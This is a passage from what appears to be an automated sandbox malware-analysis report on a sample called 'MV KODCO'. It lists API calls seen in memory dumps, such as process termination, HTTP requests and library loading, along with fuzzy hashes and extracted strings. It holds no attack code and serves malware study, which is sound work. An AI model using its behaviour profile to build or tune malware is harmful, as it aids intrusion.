                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: CapsDevice$ExceptionRaiseRelease
                                                          • String ID:
                                                          • API String ID: 603618608-0
                                                          • Opcode ID: 6a14d258d32214383497f701ff98b6aaef1f1147b2c1de11471eec2d535d0ff9
                                                          • Instruction ID: 8fc16dc894268faef4fcc1f5dc4d13ab026d6c4699ec3ce3c0c36daeffee68f1
                                                          • Opcode Fuzzy Hash: 6a14d258d32214383497f701ff98b6aaef1f1147b2c1de11471eec2d535d0ff9
                                                          • Instruction Fuzzy Hash: E30171B5E40214BBEB109BA6CC45A9ABFBAEB48351F044066EE04A7390D6B19C008BA0
                                                          APIs
                                                          • __init_pointers.LIBCMT ref: 00607B47
                                                            • Part of subcall function 0060123A: __initp_misc_winsig.LIBCMT ref: 0060125E
                                                            • Part of subcall function 0060123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00607F51
                                                            • Part of subcall function 0060123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00607F65
                                                            • Part of subcall function 0060123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00607F78
                                                            • Part of subcall function 0060123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00607F8B
                                                            • Part of subcall function 0060123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00607F9E
                                                            • Part of subcall function 0060123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00607FB1
                                                            • Part of subcall function 0060123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00607FC4
                                                            • Part of subcall function 0060123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00607FD7
                                                            • Part of subcall function 0060123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00607FEA
                                                            • Part of subcall function 0060123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00607FFD
                                                            • Part of subcall function 0060123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00608010
                                                            • Part of subcall function 0060123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00608023
                                                            • Part of subcall function 0060123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00608036
                                                            • Part of subcall function 0060123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00608049
                                                            • Part of subcall function 0060123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0060805C
                                                            • Part of subcall function 0060123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 0060806F
                                                          • __mtinitlocks.LIBCMT ref: 00607B4C
                                                            • Part of subcall function 00607E23: InitializeCriticalSectionAndSpinCount.KERNEL32(0069AC68,00000FA0,?,?,00607B51,00605E77,00696C70,00000014), ref: 00607E41
                                                          • __mtterm.LIBCMT ref: 00607B55
                                                            • Part of subcall function 00607BBD: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00607B5A,00605E77,00696C70,00000014), ref: 00607D3F
                                                            • Part of subcall function 00607BBD: _free.LIBCMT ref: 00607D46
                                                            • Part of subcall function 00607BBD: DeleteCriticalSection.KERNEL32(0069AC68,?,?,00607B5A,00605E77,00696C70,00000014), ref: 00607D68
                                                          • __calloc_crt.LIBCMT ref: 00607B7A
                                                          • GetCurrentThreadId.KERNEL32 ref: 00607BA3
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                          • String ID:
                                                          • API String ID: 2942034483-0
                                                          • Opcode ID: b9436f18880984e27325464b7017c0ab51040ca1457c2344a783774b0c270e3a
                                                          • Instruction ID: b73ac60c77f66fe14a234cea3ba474c4dacdd13694a905d96ca64d04e043bee3
                                                          • Opcode Fuzzy Hash: b9436f18880984e27325464b7017c0ab51040ca1457c2344a783774b0c270e3a
                                                          • Instruction Fuzzy Hash: 93F06232E9D25219E6AC7E74BC4668B36C79B02730B20069DF860C51D2EB61B84241A8
                                                          APIs
                                                          • MapVirtualKeyW.USER32(0000005B,00000000), ref: 005E281D
                                                          • MapVirtualKeyW.USER32(00000010,00000000), ref: 005E2825
                                                          • MapVirtualKeyW.USER32(000000A0,00000000), ref: 005E2830
                                                          • MapVirtualKeyW.USER32(000000A1,00000000), ref: 005E283B
                                                          • MapVirtualKeyW.USER32(00000011,00000000), ref: 005E2843
                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 005E284B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Virtual
                                                          • String ID:
                                                          • API String ID: 4278518827-0
                                                          • Opcode ID: ef04455abe9c70f2963d72bf96d3835db57de8351f39d5fbc8a0f532f1965b1a
                                                          • Instruction ID: 49910c6238727ca70bdb26027739fc97b21a77bfbbce0d3680700ba8636029ae
                                                          • Opcode Fuzzy Hash: ef04455abe9c70f2963d72bf96d3835db57de8351f39d5fbc8a0f532f1965b1a
                                                          • Instruction Fuzzy Hash: 520148B0901B597DE3008F6A8C85A52FEA8FF19354F00411BD15C47941C7F5A864CBE5
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                                          • String ID:
                                                          • API String ID: 1423608774-0
                                                          • Opcode ID: 84b7787cb927ca88231d3776c0e761e321c0dd149ce0b967809ca5ea6b8b2648
                                                          • Instruction ID: 0a3dda3f6d7a315c8c1728b72ca5a5ed0fdcdb8939901e8613fc2ec067af7be9
                                                          • Opcode Fuzzy Hash: 84b7787cb927ca88231d3776c0e761e321c0dd149ce0b967809ca5ea6b8b2648
                                                          • Instruction Fuzzy Hash: E401D132A02721ABD7141B55FC59DEF776BFFC8701B041029F603965A8CBB49900CF60
                                                          APIs
                                                          • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00627C07
                                                          • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00627C1D
                                                          • GetWindowThreadProcessId.USER32(?,?), ref: 00627C2C
                                                          • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00627C3B
                                                          • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00627C45
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00627C4C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                          • String ID:
                                                          • API String ID: 839392675-0
                                                          • Opcode ID: b72a5059cbe0cc64e78bd53c8d6a65fff2b90911f48f283d5e364f3efa08b3ed
                                                          • Instruction ID: b5188f2ebee3683941aacaa98d80b4d998de7e882a9f7284cd1a7750c1d62406
                                                          • Opcode Fuzzy Hash: b72a5059cbe0cc64e78bd53c8d6a65fff2b90911f48f283d5e364f3efa08b3ed
                                                          • Instruction Fuzzy Hash: 05F01772A41158BBE7215B62EC0EEEF7B7DEBCAB11F001018FA01E11A1D7E05A41C6B5
                                                          APIs
                                                          • InterlockedExchange.KERNEL32(?,?), ref: 00629A33
                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,00655DEE,?,?,?,?,?,005EED63), ref: 00629A44
                                                          • TerminateThread.KERNEL32(?,000001F6,?,?,?,00655DEE,?,?,?,?,?,005EED63), ref: 00629A51
                                                          • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00655DEE,?,?,?,?,?,005EED63), ref: 00629A5E
                                                            • Part of subcall function 006293D1: CloseHandle.KERNEL32(?,?,00629A6B,?,?,?,00655DEE,?,?,?,?,?,005EED63), ref: 006293DB
                                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 00629A71
                                                          • LeaveCriticalSection.KERNEL32(?,?,?,?,00655DEE,?,?,?,?,?,005EED63), ref: 00629A78
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                          • String ID:
                                                          • API String ID: 3495660284-0
                                                          • Opcode ID: d8381096936229fcfabcf7e824b63773c8906af8f3745e22efd44dd7bc0671e5
                                                          • Instruction ID: 307ebe0eb15646e5dc39f64788594e59188303ff51f1847ed50e4d7309d7c71d
                                                          • Opcode Fuzzy Hash: d8381096936229fcfabcf7e824b63773c8906af8f3745e22efd44dd7bc0671e5
                                                          • Instruction Fuzzy Hash: D2F0BE32A41611ABD3111BA4FC88DEE372FFF88701F041025F203A51A8CBB59A00DB60
                                                          APIs
                                                            • Part of subcall function 005FF4EA: std::exception::exception.LIBCMT ref: 005FF51E
                                                            • Part of subcall function 005FF4EA: __CxxThrowException@8.LIBCMT ref: 005FF533
                                                          • __swprintf.LIBCMT ref: 005E1EA6
                                                          Strings
                                                          • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 005E1D49
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Exception@8Throw__swprintfstd::exception::exception
                                                          • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                          • API String ID: 2125237772-557222456
                                                          • Opcode ID: 12c479a2406892d239364f381c97e745c3597c173c93fd12a3868a61a022a119
                                                          • Instruction ID: 36e75857113ef79a525c5c126ec6645211f11fe025c5805533613e9c0c8fbcfe
                                                          • Opcode Fuzzy Hash: 12c479a2406892d239364f381c97e745c3597c173c93fd12a3868a61a022a119
                                                          • Instruction Fuzzy Hash: 5E917E715043829FC718EF25C89AC6ABBE9BFD5750F00491DF885972A1EB70ED09CB92
                                                          APIs
                                                          • VariantInit.OLEAUT32(?), ref: 0063B006
                                                          • CharUpperBuffW.USER32(?,?), ref: 0063B115
                                                          • VariantClear.OLEAUT32(?), ref: 0063B298
                                                            • Part of subcall function 00629DC5: VariantInit.OLEAUT32(00000000), ref: 00629E05
                                                            • Part of subcall function 00629DC5: VariantCopy.OLEAUT32(?,?), ref: 00629E0E
                                                            • Part of subcall function 00629DC5: VariantClear.OLEAUT32(?), ref: 00629E1A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                          • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                          • API String ID: 4237274167-1221869570
                                                          • Opcode ID: 54565f1c857e22802eb815789308c1f2512c206be96d43cffaeeee35360c181a
                                                          • Instruction ID: 94fc25b85d6a12ef575a4cae4cfc322105dea3b2648d719ebc9d16db1d6a8b83
                                                          • Opcode Fuzzy Hash: 54565f1c857e22802eb815789308c1f2512c206be96d43cffaeeee35360c181a
                                                          • Instruction Fuzzy Hash: 37916A706043429FCB14DF25C4859ABBBE6BF88700F04496DF99A9B362DB31E905CB92
                                                          APIs
                                                            • Part of subcall function 005FC6F4: _wcscpy.LIBCMT ref: 005FC717
                                                          • _memset.LIBCMT ref: 00625438
                                                          • GetMenuItemInfoW.USER32(?), ref: 00625467
                                                          • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00625513
                                                          • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0062553D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                          • String ID: 0
                                                          • API String ID: 4152858687-4108050209
                                                          • Opcode ID: aaab0b5dd5ab1bae68d9f10090f1cd36848c98bf882eb6122e7139bd6ddb06ec
                                                          • Instruction ID: 1d242e6912a47cc19e5895365b26323029a143a6c7d52cbdef5193727612cf6d
                                                          • Opcode Fuzzy Hash: aaab0b5dd5ab1bae68d9f10090f1cd36848c98bf882eb6122e7139bd6ddb06ec
                                                          • Instruction Fuzzy Hash: 2E51E171504A219BD724EE28E8456ABBBEBAF86350F04052AF897E2291E770CD458F52
                                                          APIs
                                                          • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0062027B
                                                          • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 006202B1
                                                          • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 006202C2
                                                          • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00620344
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: ErrorMode$AddressCreateInstanceProc
                                                          • String ID: DllGetClassObject
                                                          • API String ID: 753597075-1075368562
                                                          • Opcode ID: 0565f7ed6957f3b90cff38c8ca26f55f881ae4fb7737bcf9d8e790e86fc52df3
                                                          • Instruction ID: 8a79861f7556bc18c6b15119ed47b6db23a7beac5d3a978e8612356a9ab2907a
                                                          • Opcode Fuzzy Hash: 0565f7ed6957f3b90cff38c8ca26f55f881ae4fb7737bcf9d8e790e86fc52df3
                                                          • Instruction Fuzzy Hash: 81415D71A00615EFEB05CF54D8C4B9ABBBAEF48314B1480ADE9099F206D7B1D944CFA0
                                                          APIs
                                                          • _memset.LIBCMT ref: 00625075
                                                          • GetMenuItemInfoW.USER32 ref: 00625091
                                                          • DeleteMenu.USER32(00000004,00000007,00000000), ref: 006250D7
                                                          • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,006A1708,00000000), ref: 00625120
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Menu$Delete$InfoItem_memset
                                                          • String ID: 0
                                                          • API String ID: 1173514356-4108050209
                                                          • Opcode ID: 71cc52d71eff8ae3c92770de595c7e2dfc79bf45901678956618c670a55dd165
                                                          • Instruction ID: ecafecfae94a5f50b72be8c3acadc6d96ed1c96fe6783809aea7517f0f7266f5
                                                          • Opcode Fuzzy Hash: 71cc52d71eff8ae3c92770de595c7e2dfc79bf45901678956618c670a55dd165
                                                          • Instruction Fuzzy Hash: 0841C130204B119FD724DF28EC88B6AB7E6AF85324F14465EF89697391D770E810CF66
                                                          APIs
                                                          • CharLowerBuffW.USER32(?,?,?,?), ref: 00640587
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: BuffCharLower
                                                          • String ID: cdecl$none$stdcall$winapi
                                                          • API String ID: 2358735015-567219261
                                                          • Opcode ID: a93b8bcc7edfbdea23eca5fcbee59ae5c11197382efed46785e138303f5caa16
                                                          • Instruction ID: e3045cf13a2307020701f59e717ab9f487d0d34b77a6df071626a7147c244d40
                                                          • Opcode Fuzzy Hash: a93b8bcc7edfbdea23eca5fcbee59ae5c11197382efed46785e138303f5caa16
                                                          • Instruction Fuzzy Hash: C131D23050022AAFDF04EF54CD419EEBBBAFF94314B004629F966A76D1DB71E906CB80
                                                          APIs
                                                          • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 0061B88E
                                                          • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 0061B8A1
                                                          • SendMessageW.USER32(?,00000189,?,00000000), ref: 0061B8D1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID: ComboBox$ListBox
                                                          • API String ID: 3850602802-1403004172
                                                          • Opcode ID: 9d0d47338f470e1da78e807e853c08d8995d1523e1d86ac83a0385c4b505f348
                                                          • Instruction ID: bd44ea35260739d984291523ec0c886bf1fbfb9adc851f3da24f0bb5aa495b1d
                                                          • Opcode Fuzzy Hash: 9d0d47338f470e1da78e807e853c08d8995d1523e1d86ac83a0385c4b505f348
                                                          • Instruction Fuzzy Hash: D0212372A00109BFDB08AB65C88ADFE7B7EEF45750B14412DF061A71E0DB745D469760
                                                          APIs
                                                          • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00634401
                                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00634427
                                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00634457
                                                          • InternetCloseHandle.WININET(00000000), ref: 0063449E
                                                            • Part of subcall function 00635052: GetLastError.KERNEL32(?,?,006343CC,00000000,00000000,00000001), ref: 00635067
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                                          • String ID:
                                                          • API String ID: 1951874230-3916222277
                                                          • Opcode ID: 9d12bccfa1dbc548527ad79d973e77b16d6a56f9aa9aca6a67042eefc53c0866
                                                          • Instruction ID: 6e3afc00860a2af803f9320c9cd4271f265b583f40133d3ba7ab13b3416e0c85
                                                          • Opcode Fuzzy Hash: 9d12bccfa1dbc548527ad79d973e77b16d6a56f9aa9aca6a67042eefc53c0866
                                                          • Instruction Fuzzy Hash: 5321CFB2600208BFE7119F54CC84EBFBAEEEB48748F10802AF10997241EE65AD0597F1
                                                          APIs
                                                            • Part of subcall function 005FD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 005FD1BA
                                                            • Part of subcall function 005FD17C: GetStockObject.GDI32(00000011), ref: 005FD1CE
                                                            • Part of subcall function 005FD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 005FD1D8
                                                          • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 0064915C
                                                          • LoadLibraryW.KERNEL32(?), ref: 00649163
                                                          • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00649178
                                                          • DestroyWindow.USER32(?), ref: 00649180
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                          • String ID: SysAnimate32
                                                          • API String ID: 4146253029-1011021900
                                                          • Opcode ID: b572256348464a9531b3c8dc9027ed7273b7f98bd937e6bfbe982173c34b8850
                                                          • Instruction ID: 9b0318a192dc83fa4d69c3155d3187f90446e5afc8b03a48f84422ca7180a01a
